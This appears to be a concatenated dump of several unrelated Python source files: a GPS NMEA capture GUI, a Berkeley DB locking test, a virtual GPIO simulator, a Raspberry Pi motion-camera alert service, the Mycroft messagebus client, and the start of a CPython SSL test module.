text='Loading capture file - {}'.format(inputfile),
fg='black', bg='gold')
self.update_idletasks()
self.sentencemanager, sentences = \
capturefile.open_text_file(inputfile)
for tstamp in self.sentencemanager.positions:
pos = self.sentencemanager.positions[tstamp]
latestpos = [pos['position no'], pos['latitude'],
pos['longitude'], pos['time']]
self.tabcontrol.positionstab.add_new_line(latestpos)
for sentence in sentences:
self.tabcontrol.sentencestab.append_text(sentence)
self.tabcontrol.statustab.write_stats()
self.statuslabel.config(
text='Loaded capture file - {}'.format(inputfile),
fg='black', bg='light grey')
self.update_idletasks()
except (FileNotFoundError, TypeError):
self.statuslabel.config(text='', bg='light grey')
self.update_idletasks()
return
def updategui(self, stopevent):
"""
update the nmea sentence manager from the serial port
run in another thread whilst the serial read is running and
get NMEA sentences from the queue and process them
Args:
stopevent(threading.Event): a threading stop event
"""
while not stopevent.is_set():
if threading.get_ident() == self.currentupdatethreadid:
qdata = self.mpq.get()
if qdata:
with self.threadlock:
self.tabcontrol.sentencestab.append_text(qdata)
self.sentencemanager.process_sentence(qdata)
try:
posrep = self.sentencemanager.get_latest_position()
if posrep['time'] not in self.recordedtimes:
self.tabcontrol.sentencestab.append_text(qdata)
latestpos = [
posrep['position no'], posrep['latitude'],
posrep['longitude'], posrep['time']]
self.tabcontrol.positionstab.add_new_line(
latestpos)
self.recordedtimes.append(posrep['time'])
if self.livemap:
self.livemap.kmldoc.clear()
self.livemap.create_kml_header('live map')
self.livemap.add_kml_placemark(
posrep['time'], 'last known position',
str(posrep['longitude']),
str(posrep['latitude']))
self.livemap.close_kml_file()
self.livemap.write_kml_doc_file()
self.tabcontrol.statustab.write_stats()
except nmea.NoSuitablePositionReport:
continue
def quit(self):
"""
open a confirmation box asking if the user wants to quit if yes then
stop the serial device and exit the program
"""
res = tkinter.messagebox.askyesno('Exiting Program', 'Are you sure?')
if res:
if self.serialread:
self.stop_serial_read()
self.destroy()
|
test_lock.py
|
"""
TestCases for testing the locking sub-system.
"""
import time
import unittest
from test_all import db, test_support, verbose, have_threads, \
get_new_environment_path, get_new_database_path
if have_threads :
from threading import Thread
import sys
if sys.version_info[0] < 3 :
from threading import currentThread
else :
from threading import current_thread as currentThread
#----------------------------------------------------------------------
class LockingTestCase(unittest.TestCase):
def setUp(self):
self.homeDir = get_new_environment_path()
self.env = db.DBEnv()
self.env.open(self.homeDir, db.DB_THREAD | db.DB_INIT_MPOOL |
db.DB_INIT_LOCK | db.DB_CREATE)
def tearDown(self):
self.env.close()
test_support.rmtree(self.homeDir)
def test01_simple(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test01_simple..." % self.__class__.__name__
anID = self.env.lock_id()
if verbose:
print "locker ID: %s" % anID
lock = self.env.lock_get(anID, "some locked thing", db.DB_LOCK_WRITE)
if verbose:
print "Acquired lock: %s" % lock
self.env.lock_put(lock)
if verbose:
print "Released lock: %s" % lock
self.env.lock_id_free(anID)
def test02_threaded(self):
if verbose:
print '\n', '-=' * 30
print "Running %s.test02_threaded..." % self.__class__.__name__
threads = []
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_READ,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
threads.append(Thread(target = self.theThread,
args=(db.DB_LOCK_WRITE,)))
for t in threads:
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
for t in threads:
t.join()
def test03_lock_timeout(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 0)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 0)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_LOCK_TIMEOUT), 123456)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
self.assertEqual(self.env.get_timeout(db.DB_SET_TXN_TIMEOUT), 7890123)
def test04_lock_timeout2(self):
self.env.set_timeout(0, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(0, db.DB_SET_TXN_TIMEOUT)
self.env.set_timeout(123456, db.DB_SET_LOCK_TIMEOUT)
self.env.set_timeout(7890123, db.DB_SET_TXN_TIMEOUT)
def deadlock_detection() :
while not deadlock_detection.end :
deadlock_detection.count = \
self.env.lock_detect(db.DB_LOCK_EXPIRE)
if deadlock_detection.count :
while not deadlock_detection.end :
pass
break
time.sleep(0.01)
deadlock_detection.end=False
deadlock_detection.count=0
t=Thread(target=deadlock_detection)
import sys
if sys.version_info[0] < 3 :
t.setDaemon(True)
else :
t.daemon = True
t.start()
self.env.set_timeout(100000, db.DB_SET_LOCK_TIMEOUT)
anID = self.env.lock_id()
anID2 = self.env.lock_id()
self.assertNotEqual(anID, anID2)
lock = self.env.lock_get(anID, "shared lock", db.DB_LOCK_WRITE)
start_time=time.time()
self.assertRaises(db.DBLockNotGrantedError,
self.env.lock_get,anID2, "shared lock", db.DB_LOCK_READ)
end_time=time.time()
deadlock_detection.end=True
# Floating point rounding
self.assertTrue((end_time-start_time) >= 0.0999)
self.env.lock_put(lock)
t.join()
self.env.lock_id_free(anID)
self.env.lock_id_free(anID2)
if db.version() >= (4,6):
self.assertTrue(deadlock_detection.count>0)
def theThread(self, lockType):
import sys
if sys.version_info[0] < 3 :
name = currentThread().getName()
else :
name = currentThread().name
if lockType == db.DB_LOCK_WRITE:
lt = "write"
else:
lt = "read"
anID = self.env.lock_id()
if verbose:
print "%s: locker ID: %s" % (name, anID)
for i in xrange(1000) :
lock = self.env.lock_get(anID, "some locked thing", lockType)
if verbose:
print "%s: Acquired %s lock: %s" % (name, lt, lock)
self.env.lock_put(lock)
if verbose:
print "%s: Released %s lock: %s" % (name, lt, lock)
self.env.lock_id_free(anID)
#----------------------------------------------------------------------
def test_suite():
suite = unittest.TestSuite()
if have_threads:
suite.addTest(unittest.makeSuite(LockingTestCase))
else:
suite.addTest(unittest.makeSuite(LockingTestCase, 'test01'))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='test_suite')
|
tkgpio.py
|
from .base import TkDevice, SingletonMeta
from .base import PreciseMockTriggerPin, PreciseMockFactory, PreciseMockChargingPin
from gpiozero import Device
from gpiozero.pins.mock import MockPWMPin
from PIL import ImageEnhance, Image, ImageDraw, ImageFont, ImageTk
# from sounddevice import play, stop
import numpy
import scipy.signal
from tkinter import Tk, Frame, Label, Button, Scale, HORIZONTAL, VERTICAL, CENTER
from threading import Thread, Timer
from sys import path, exit
from pathlib import Path
from functools import partial
from math import sqrt
import os
class TkCircuit(metaclass=SingletonMeta):
def __init__(self, setup):
Device.pin_factory = PreciseMockFactory(pin_class=MockPWMPin)
path.insert(0, str(Path(__file__).parent.absolute()))
default_setup = {
"name": "Virtual GPIO",
"width": 500, "height": 500,
"leds":[], "buzzers":[], "buttons":[],
"lcds":[],
"motion_sensors": [],
"distance_sensors": [],
"light_sensors": [],
"infrared_receiver": None,
"infrared_emitter": None
}
default_setup.update(setup)
setup = default_setup
self._root = Tk()
self._root.title(setup["name"])
self._root.geometry("%dx%d" % (setup["width"], setup["height"]))
self._root.resizable(False, False)
self._root["background"] = "white"
self._root.protocol("WM_DELETE_WINDOW", self._on_closing)
self._root.tk.call("tk", "scaling", 1.0)
self._outputs = []
self._outputs += [self.add_device(TkLED, parameters) for parameters in setup["leds"]]
self._outputs += [self.add_device(TkBuzzer, parameters) for parameters in setup["buzzers"]]
self._lcds = [self.add_device(TkLCD, parameters) for parameters in setup["lcds"]]
for parameters in setup["buttons"]:
self.add_device(TkButton, parameters)
for parameters in setup["distance_sensors"]:
self.add_device(TkDistanceSensor, parameters)
for parameters in setup["light_sensors"]:
self.add_device(TkLightSensor, parameters)
for parameters in setup["motion_sensors"]:
self.add_device(TkMotionSensor, parameters)
if setup["infrared_receiver"] != None:
self.add_device(TkInfraredReceiver, setup["infrared_receiver"])
if setup["infrared_emitter"] != None:
self.add_device(TkInfraredEmitter, setup["infrared_emitter"])
def add_device(self, device_class, parameters):
return device_class(self._root, **parameters)
def run(self, function):
thread = Thread(target=function, daemon=True)
thread.start()
self._root.after(10, self._update_outputs)
self._root.mainloop()
def _update_outputs(self):
for output in self._outputs:
output.update()
self._root.after(10, self._update_outputs)
def update_lcds(self, pins, text):
for lcds in self._lcds:
lcds.update_text(pins, text)
def _on_closing(self):
exit()
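# Hypothetical usage sketch of TkCircuit (not part of the original module).
# The setup keys mirror the default_setup dict above, and each device dict
# holds the keyword arguments of the matching Tk* class (x, y, name, pin):
#
#   circuit = TkCircuit({
#       "name": "Blink demo",
#       "leds": [{"x": 100, "y": 100, "name": "LED 1", "pin": 21}],
#       "buttons": [{"x": 100, "y": 200, "name": "Button 1", "pin": 11}],
#   })
#
#   def main():
#       from gpiozero import LED
#       LED(21).blink()
#
#   circuit.run(main)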
class TkLCD(TkDevice):
_image = None
_photo_image = None
def __init__(self, root, x, y, name, pins, columns, lines):
super().__init__(root, x, y, name)
self._redraw()
self._pins = pins
self._columns = columns
self._lines = lines
self._label = Label(root)
self._label.place(x=x, y=y)
self.update_text(self._pins, "")
def update_text(self, pins, text):
MARGIN = 8
FONT_SIZE = 17
CHAR_WIDTH = 12
CHAR_HEIGHT = 16
CHAR_X_GAP = 3
CHAR_Y_GAP = 5
image_width = MARGIN * 2 + self._columns * (CHAR_WIDTH) + (self._columns - 1) * CHAR_X_GAP
image_height = MARGIN * 2 + self._lines * (CHAR_HEIGHT) + (self._lines - 1) * CHAR_Y_GAP
if pins == self._pins:
image = Image.new('RGB', (image_width, image_height), color="#82E007")
current_folder = os.path.dirname(__file__)
font_path = os.path.join(current_folder, "resources/fonts/hd44780.ttf")
font = ImageFont.truetype(font_path, FONT_SIZE)
d = ImageDraw.Draw(image)
x = MARGIN
for j in range(0, self._columns):
y = MARGIN
for i in range(0, self._lines):
d.rectangle((x, y, x+CHAR_WIDTH, y+CHAR_HEIGHT), fill ="#72D000")
y += (CHAR_Y_GAP + CHAR_HEIGHT)
x += (CHAR_X_GAP + CHAR_WIDTH)
x = MARGIN
y = MARGIN
line = 1
column = 1
for character in text:
if character == "\n":
y += (CHAR_Y_GAP + CHAR_HEIGHT)
x = MARGIN
line += 1
column = 1
else:
if line <= self._lines and column <= self._columns:
d.text((x,y), character, font=font, fill="black")
x += (CHAR_X_GAP + CHAR_WIDTH)
column += 1
self._photo_image = ImageTk.PhotoImage(image)
self._label.configure(image = self._photo_image)
self._redraw()
self._root.update()
class TkBuzzer(TkDevice):
SAMPLE_RATE = 44000
PEAK = 0.1
DUTY_CYCLE = 0.5
def __init__(self, root, x, y, name, pin, frequency=440):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._previous_state = None
self._set_image_for_state("buzzer_on.png", "on", (50, 33))
self._set_image_for_state("buzzer_off.png", "off", (50, 33))
self._create_main_widget(Label, "off")
if frequency != None:
n_samples = self.SAMPLE_RATE
t = numpy.linspace(0, 1, int(500 * 440/frequency), endpoint=False)
wave = scipy.signal.square(2 * numpy.pi * 5 * t, duty=self.DUTY_CYCLE)
wave = numpy.resize(wave, (n_samples,))
self._sample_wave = (self.PEAK / 2 * wave.astype(numpy.int16))
else:
self._sample_wave = numpy.empty(0)
def update(self):
if self._previous_state != self._pin.state:
if self._pin.state == True:
self._change_widget_image("on")
# if len(self._sample_wave) > 0:
# play(self._sample_wave, self.SAMPLE_RATE, loop=True)
else:
self._change_widget_image("off")
# if len(self._sample_wave) > 0:
# stop()
self._previous_state = self._pin.state
self._redraw()
class TkLED(TkDevice):
on_image = None
def __init__(self, root, x, y, name, pin):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._previous_state = None
TkLED.on_image = self._set_image_for_state("led_on.png", "on", (30, 30))
self._set_image_for_state("led_off.png", "off", (30, 30))
self._create_main_widget(Label, "off")
def update(self):
if self._previous_state != self._pin.state:
if isinstance(self._pin.state, float):
converter = ImageEnhance.Color(TkLED.on_image)
desaturated_image = converter.enhance(self._pin.state)
self._change_widget_image(desaturated_image)
elif self._pin.state == True:
self._change_widget_image("on")
else:
self._change_widget_image("off")
self._previous_state = self._pin.state
self._redraw()
class TkButton(TkDevice):
def __init__(self, root, x, y, name, pin):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._set_image_for_state("button_pressed.png", "on", (30, 30))
self._set_image_for_state("button_released.png", "off", (30, 30))
self._create_main_widget(Button, "off")
self._widget.config(borderwidth=0,highlightthickness = 0,background="white")
self._widget.bind("<ButtonPress>", self._on_press)
self._widget.bind("<ButtonRelease>", self._on_release)
def _on_press(self, botao):
self._change_widget_image("on")
thread = Thread(target=self._change_pin, daemon=True, args=(True,))
thread.start()
def _on_release(self, botao):
self._change_widget_image("off")
thread = Thread(target=self._change_pin, daemon=True, args=(False,))
thread.start()
def _change_pin(self, is_press):
if is_press:
self._pin.drive_low()
else:
self._pin.drive_high()
class TkMotionSensor(TkDevice):
def __init__(self, root, x, y, name, pin, detection_radius=50, delay_duration=5, block_duration=3):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin)
self._detection_radius = detection_radius
self._delay_duration = delay_duration
self._block_duration = block_duration
self._motion_timer = None
self._block_timer = None
self._set_image_for_state("motion_sensor_on.png", "motion", (80, 60))
self._set_image_for_state("motion_sensor_off.png", "no motion", (80, 60))
self._set_image_for_state("motion_sensor_wait.png", "wait", (80, 60))
self._create_main_widget(Label, "no motion")
root.bind('<Motion>', self._motion_detected)
def _motion_detected(self, event):
x_pointer = self._root.winfo_pointerx() - self._root.winfo_rootx()
y_pointer = self._root.winfo_pointery() - self._root.winfo_rooty()
x_center = self._widget.winfo_x() + self._widget.winfo_width() / 2
y_center = self._widget.winfo_y() + self._widget.winfo_height() / 2
distance = sqrt(pow(x_pointer - x_center, 2) + pow(y_pointer - y_center, 2))
if distance < self._detection_radius and self._block_timer == None:
if self._motion_timer == None:
self._change_widget_image("motion")
else:
self._motion_timer.cancel()
self._pin.drive_high()
self._motion_timer = Timer(self._delay_duration, self._remove_detection)
self._motion_timer.start()
def _remove_detection(self):
self._pin.drive_low()
self._change_widget_image("wait")
self._motion_timer = None
self._block_timer = Timer(self._block_duration, self._remove_block)
self._block_timer.start()
def _remove_block(self):
self._change_widget_image("no motion")
self._block_timer = None
class TkDistanceSensor(TkDevice):
def __init__(self, root, x, y, name, trigger_pin, echo_pin, min_distance=0, max_distance=50):
super().__init__(root, x, y, name)
self._echo_pin = Device.pin_factory.pin(echo_pin)
self._trigger_pin = Device.pin_factory.pin(trigger_pin,
pin_class=PreciseMockTriggerPin, echo_pin=self._echo_pin, echo_time=0.004)
self._echo_pin._bounce = 0
self._trigger_pin._bounce = 0
self._set_image_for_state("distance_sensor.png", "normal", (86, 50))
self._create_main_widget(Label, "normal")
self._scale = Scale(root, from_=min_distance, to=max_distance,
orient=HORIZONTAL, command=self._scale_changed, sliderlength=20, length=150, highlightthickness = 0, background="white")
self._scale.place(x=x+100, y=y)
self._scale.set(round((min_distance + max_distance) / 2))
self._scale_changed(self._scale.get())
def _scale_changed(self, value):
speed_of_sound = 343.26 # m/s
distance = float(value) / 100 # cm -> m
self._trigger_pin.echo_time = distance * 2 / speed_of_sound
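# Worked example for the conversion above (illustrative): a slider value of
# 50 cm gives distance = 0.5 m, so echo_time = 2 * 0.5 / 343.26 ≈ 2.9 ms.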
class TkLightSensor(TkDevice):
def __init__(self, root, x, y, name, pin):
super().__init__(root, x, y, name)
self._pin = Device.pin_factory.pin(pin, pin_class=PreciseMockChargingPin)
self._scale = Scale(root, from_=0, to=90, showvalue=0,
orient=VERTICAL, command=self._scale_changed, sliderlength=20, length=150, highlightthickness = 0, background="white")
self._scale.place(x=x+90, y=y)
self._scale.set(30)
self._scale_changed(self._scale.get())
self._set_image_for_state("light_sensor.png", "normal", (75, 150))
self._create_main_widget(Label, "normal")
def _scale_changed(self, value):
self._pin.charge_time = float(value) / 10000
class TkInfraredReceiver(TkDevice, metaclass=SingletonMeta):
def __init__(self, root, x, y, name, config, remote_control):
super().__init__(root, x, y, name)
remote = remote_control
frame = Frame(root, bg = remote["color"], width = remote["width"], height = remote["height"])
frame.place(x=x, y=y)
self._config = config
self._key_codes = []
self._pressed_key_codes = []
for i in range(0, len(remote["key_rows"])):
row = remote["key_rows"][i]
for j in range(0, len(row["buttons"])):
button_setup = row["buttons"][j]
if button_setup != None:
code = button_setup.get("code", "KEY_" + button_setup["name"])
self._key_codes.append(code)
command = partial(self._key_press, code)
button = Button(frame, text=button_setup["name"],
width=remote["key_width"], height=remote["key_height"],
command=command,
justify=CENTER, highlightbackground=remote["color"])
button.grid(row=i, column=j, padx=8, pady=8)
frame.configure(width = remote["width"], height = remote["height"])
def config_name(self):
return self._config
def clear_codes(self):
self._pressed_key_codes = []
def get_next_code(self):
if len(self._pressed_key_codes) == 0:
return []
else:
return [self._pressed_key_codes.pop(0)]
def _key_press(self, code):
self._pressed_key_codes.append(code)
class TkInfraredEmitter(TkDevice, metaclass=SingletonMeta):
def __init__(self, root, x, y, name, remote_controls):
super().__init__(root, x, y, name)
self._set_image_for_state("emitter_on.png", "on", (50, 30))
self._set_image_for_state("emitter_off.png", "off", (50, 30))
self._create_main_widget(Label, "off")
self._remote_controls = remote_controls
self._timer = None
def list_remotes(self, remote):
return self._remote_controls.keys()
def list_codes(self, remote):
valid_codes = self._remote_controls.get(remote, None)
if valid_codes == None:
print("\x1b[1;37;41m" + remote + ": INVALID REMOTE CONTROL!" + "\x1b[0m")
return valid_codes
def send_once(self, remote, codes, count):
valid_codes = self.list_codes(remote)
if valid_codes == None:
return
has_valid_code = False
for code in codes:
if code in valid_codes:
print("\x1b[1;37;42m" + code + " of remote \"" + remote + "\" transmitted!" + "\x1b[0m")
has_valid_code = True
else:
print("\x1b[1;37;41m" + code + ": INVALID CODE FOR REMOTE \"" + remote + "\"!" + "\x1b[0m")
if has_valid_code:
if self._timer != None:
self._timer.cancel()
self._change_widget_image("on")
# keep a reference so the pending timer can be cancelled; Timer.start() returns None
self._timer = Timer(1, self._turn_off_emitter)
self._timer.start()
def _turn_off_emitter(self):
self._change_widget_image("off")
self._timer = None
|
GuardpianService.py
|
import logging
import sys
from time import sleep
from threading import Thread
log = logging.getLogger(__name__)
class GuardpianService:
def __init__(self, base_path, camera, gpio, email_sender, ifttt_enabled, ifttt_client):
self.base_path = base_path
self.camera = camera
self.gpio = gpio
self.email_sender = email_sender
self.ifttt_enabled = ifttt_enabled
self.ifttt_client = ifttt_client
self.is_ifttt_on = False # To avoid unnecessary IFTTT calls
def start(self):
try:
self.__capture_on_start()
# Add listeners for GPIO events
self.gpio.add_event_detect(self.__event_detect_callback)
# Loop forever
while True:
sleep(100)
except KeyboardInterrupt:
log.info("Quit")
pass
except Exception as e:
log.error("Not controlled error happened: " + str(e))
self.__send(image_full_path=None,
content="Some uncontrolled Error happened... Shutting down. Error: " + str(e))
pass
finally:
log.info("Cleaning GPIO and shutting down...")
self.gpio.cleanup()
self.camera.close()
sys.exit("Shutdown.")
def __capture_on_start(self):
log.info('Capturing on start!')
if self.ifttt_enabled:
self.__send_ifttt_event_on()
self.__capture_and_send('start.jpg', 'The Guardpian was started.')
if self.ifttt_enabled:
self.__send_ifttt_event_off()
def __capture_and_send(self, image_name, content):
try:
image_full_path = self.base_path + image_name
self.camera.capture(image_full_path)
self.__send(image_full_path, content)
except Exception as e:
log.error("Cannot capture... " + str(e))
def __send(self, image_full_path, content):
try:
self.email_sender.send(content, image_full_path)
except Exception as e:
log.error("Cannot send email... " + str(e))
def __event_detect_callback(self, pin):
if self.gpio.input():
log.info("Motion detected!")
if self.ifttt_enabled:
self.__send_ifttt_event_on()
self.__capture_and_send('motion.jpg', 'The Guardpian detected some motion!')
else:
log.info("Motion off.")
if self.ifttt_enabled:
self.__send_ifttt_event_off()
def __send_ifttt_event_on(self):
try:
thread = Thread(target=self.ifttt_client.send_event_on)
thread.start()
self.is_ifttt_on = True
sleep(1.5)
except Exception as e:
log.error("Cannot send IFTTT event ON ... " + str(e))
def __send_ifttt_event_off(self):
try:
if self.is_ifttt_on:
sleep(5)
thread = Thread(target=self.ifttt_client.send_event_off)
thread.start()
self.is_ifttt_on = False
except Exception as e:
log.error("Cannot send IFTTT event Off ... " + str(e))
|
client.py
|
# Copyright 2019 Mycroft AI Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
The messagebus client is an extended websocket connection that uses a
standard message format and handles serialization / deserialization
automatically. (A usage sketch is appended at the end of this file.)
"""
from collections import namedtuple
import json
import logging
import time
import traceback
from threading import Event, Thread
from pyee import ExecutorEventEmitter
from websocket import (WebSocketApp,
WebSocketConnectionClosedException,
WebSocketException)
from mycroft_bus_client.message import Message
from mycroft_bus_client.util import create_echo_function
LOG = logging.getLogger(__name__)
class MessageWaiter:
"""Wait for a single message.
Encapsulates the wait-for-a-message logic, separating the setup from the
actual waiting so that the wait can be set up, actions can be performed,
and _then_ the message can be waited for (see the sketch after this class).
Arguments:
bus: Bus to check for messages on
message_type: message type to wait for
"""
def __init__(self, bus, message_type):
self.bus = bus
self.msg_type = message_type
self.received_msg = None
# Setup response handler
self.response_event = Event()
self.bus.once(message_type, self._handler)
def _handler(self, message):
"""Receive response data."""
self.received_msg = message
self.response_event.set()
def wait(self, timeout=3.0):
"""Wait for message.
Arguments:
timeout (int or float): seconds to wait for message
Returns:
Message or None
"""
self.response_event.wait(timeout)
if not self.response_event.is_set():
# Clean up the event handler
try:
self.bus.remove(self.msg_type, self._handler)
except (ValueError, KeyError):
# ValueError occurs on pyee 5.0.1 removing handlers
# registered with once.
# KeyError may theoretically occur if the event occurs as
# the handler is removed
pass
return self.received_msg
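# --- Illustrative sketch (not part of the original file) ---
# The setup-then-wait pattern described in the MessageWaiter docstring, with a
# hypothetical message type; assumes `bus` is a connected MessageBusClient
# (defined below in this module).
def _example_setup_then_wait(bus):
    # 1. Register the waiter first so a fast reply cannot slip past.
    waiter = MessageWaiter(bus, 'example.request.response')
    # 2. Perform the action that should trigger the reply.
    bus.emit(Message('example.request'))
    # 3. Block for up to the timeout; returns the Message or None.
    return waiter.wait(timeout=3.0)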
MessageBusClientConf = namedtuple('MessageBusClientConf',
['host', 'port', 'route', 'ssl'])
class MessageBusClient:
"""The Mycroft Messagebus Client
The Messagebus client connects to the Mycroft messagebus service
and allows communication with the system. It has been extended to work
like the pyee EventEmitter and tries to offer as much convenience as
possible to the developer.
"""
def __init__(self, host='0.0.0.0', port=8181, route='/core', ssl=False,
emitter=None):
self.config = MessageBusClientConf(host, port, route, ssl)
self.emitter = emitter or ExecutorEventEmitter()
self.client = self.create_client()
self.retry = 5
self.connected_event = Event()
self.started_running = False
@staticmethod
def build_url(host, port, route, ssl):
"""Build a websocket url."""
return '{scheme}://{host}:{port}{route}'.format(
scheme='wss' if ssl else 'ws',
host=host,
port=str(port),
route=route)
def create_client(self):
"""Setup websocket client."""
url = MessageBusClient.build_url(ssl=self.config.ssl,
host=self.config.host,
port=self.config.port,
route=self.config.route)
return WebSocketApp(url, on_open=self.on_open, on_close=self.on_close,
on_error=self.on_error, on_message=self.on_message)
def on_open(self, *args):
"""Handle the "open" event from the websocket.
A Basic message with the name "open" is forwarded to the emitter.
"""
LOG.info("Connected")
self.connected_event.set()
self.emitter.emit("open")
# Restore reconnect timer to 5 seconds on successful connect
self.retry = 5
def on_close(self, *args):
"""Handle the "close" event from the websocket.
A Basic message with the name "close" is forwarded to the emitter.
"""
self.emitter.emit("close")
def on_error(self, *args):
"""On error start trying to reconnect to the websocket."""
if len(args) == 1:
error = args[0]
else:
error = args[1]
if isinstance(error, WebSocketConnectionClosedException):
LOG.warning('Could not send message because connection has closed')
else:
LOG.exception('=== %s ===', repr(error))
try:
self.emitter.emit('error', error)
if self.client.keep_running:
self.client.close()
except Exception as e:
LOG.error('Exception closing websocket: %s', repr(e))
LOG.warning("Message Bus Client "
"will reconnect in %.1f seconds.", self.retry)
time.sleep(self.retry)
self.retry = min(self.retry * 2, 60)
try:
self.emitter.emit('reconnecting')
self.client = self.create_client()
self.run_forever()
except WebSocketException:
pass
def on_message(self, *args):
"""Handle incoming websocket message.
Args:
message (str): serialized Mycroft Message
"""
if len(args) == 1:
message = args[0]
else:
message = args[1]
parsed_message = Message.deserialize(message)
self.emitter.emit('message', message)
self.emitter.emit(parsed_message.msg_type, parsed_message)
def emit(self, message):
"""Send a message onto the message bus.
This will both send the message to the local process using the
event emitter and onto the Mycroft websocket for other processes.
Args:
message (Message): Message to send
"""
if not self.connected_event.wait(10):
if not self.started_running:
raise ValueError('You must execute run_forever() '
'before emitting messages')
self.connected_event.wait()
try:
if hasattr(message, 'serialize'):
self.client.send(message.serialize())
else:
self.client.send(json.dumps(message.__dict__))
except WebSocketConnectionClosedException:
LOG.warning('Could not send %s message because connection '
'has been closed', message.msg_type)
def wait_for_message(self, message_type, timeout=3.0):
"""Wait for a message of a specific type.
Arguments:
message_type (str): the message type of the expected message
timeout: seconds to wait before timeout, defaults to 3
Returns:
The received message or None if the response timed out
"""
return MessageWaiter(self, message_type).wait(timeout)
def wait_for_response(self, message, reply_type=None, timeout=3.0):
"""Send a message and wait for a response.
Arguments:
message (Message): message to send
reply_type (str): the message type of the expected reply.
Defaults to "<message.msg_type>.response".
timeout: seconds to wait before timeout, defaults to 3
Returns:
The received message or None if the response timed out
"""
message_type = reply_type or message.msg_type + '.response'
waiter = MessageWaiter(self, message_type) # Setup response handler
# Send the message and wait for its response
self.emit(message)
return waiter.wait(timeout)
def on(self, event_name, func):
"""Register callback with event emitter.
Args:
event_name (str): message type to map to the callback
func (callable): callback function
"""
self.emitter.on(event_name, func)
def once(self, event_name, func):
"""Register callback with event emitter for a single call.
Args:
event_name (str): message type to map to the callback
func (callable): callback function
"""
self.emitter.once(event_name, func)
def remove(self, event_name, func):
"""Remove registered event.
Args:
event_name (str): message type to map to the callback
func (callable): callback function
"""
try:
if event_name not in self.emitter._events:
LOG.debug("Not able to find '%s'", event_name)
self.emitter.remove_listener(event_name, func)
except ValueError:
LOG.warning('Failed to remove event %s: %s',
event_name, str(func))
for line in traceback.format_stack():
LOG.warning(line.strip())
if event_name not in self.emitter._events:
LOG.debug("Not able to find '%s'", event_name)
LOG.warning("Existing events: %s", repr(self.emitter._events))
for evt in self.emitter._events:
LOG.warning(" %s", repr(evt))
LOG.warning(" %s", repr(self.emitter._events[evt]))
if event_name in self.emitter._events:
LOG.debug("Removing found '%s'", event_name)
else:
LOG.debug("Not able to find '%s'", event_name)
LOG.warning('----- End dump -----')
def remove_all_listeners(self, event_name):
"""Remove all listeners connected to event_name.
Arguments:
event_name: event from which to remove listeners
"""
if event_name is None:
raise ValueError
self.emitter.remove_all_listeners(event_name)
def run_forever(self):
"""Start the websocket handling."""
self.started_running = True
self.client.run_forever()
def close(self):
"""Close the websocket connection."""
self.client.close()
self.connected_event.clear()
def run_in_thread(self):
"""Launches the run_forever in a separate daemon thread."""
t = Thread(target=self.run_forever)
t.daemon = True
t.start()
return t
def echo():
"""Echo function repeating all input from a user."""
message_bus_client = MessageBusClient()
def repeat_utterance(message):
message.msg_type = 'speak'
message_bus_client.emit(message)
message_bus_client.on('message', create_echo_function(None))
message_bus_client.on('recognizer_loop:utterance', repeat_utterance)
message_bus_client.run_forever()
if __name__ == "__main__":
echo()
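# --- Illustrative sketch (not part of the original file) ---
# Minimal client usage, with hypothetical message types; assumes a Mycroft
# messagebus service is reachable at the default host/port configured above.
def _example_client_usage():
    client = MessageBusClient()
    client.run_in_thread()  # handle the websocket in a background daemon thread
    # React to every 'speak' message that comes over the bus.
    client.on('speak', lambda message: print(message.data))
    # Send a request and block up to 3 seconds for 'example.request.response'.
    reply = client.wait_for_response(Message('example.request'))
    return reply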
|
test_ssl.py
|
# Test the support for SSL and sockets
import sys
import unittest
from test import support
import socket
import select
import time
import datetime
import gc
import os
import errno
import pprint
import urllib.request
import traceback
import asyncore
import weakref
import platform
import functools
ssl = support.import_module("ssl")
try:
import threading
except ImportError:
_have_threads = False
else:
_have_threads = True
PROTOCOLS = sorted(ssl._PROTOCOL_NAMES)
HOST = support.HOST
IS_LIBRESSL = ssl.OPENSSL_VERSION.startswith('LibreSSL')
IS_OPENSSL_1_1 = not IS_LIBRESSL and ssl.OPENSSL_VERSION_INFO >= (1, 1, 0)
def data_file(*name):
return os.path.join(os.path.dirname(__file__), *name)
# The custom key and certificate files used in test_ssl are generated
# using Lib/test/make_ssl_certs.py.
# Other certificates are simply fetched from the Internet servers they
# are meant to authenticate.
CERTFILE = data_file("keycert.pem")
BYTES_CERTFILE = os.fsencode(CERTFILE)
ONLYCERT = data_file("ssl_cert.pem")
ONLYKEY = data_file("ssl_key.pem")
BYTES_ONLYCERT = os.fsencode(ONLYCERT)
BYTES_ONLYKEY = os.fsencode(ONLYKEY)
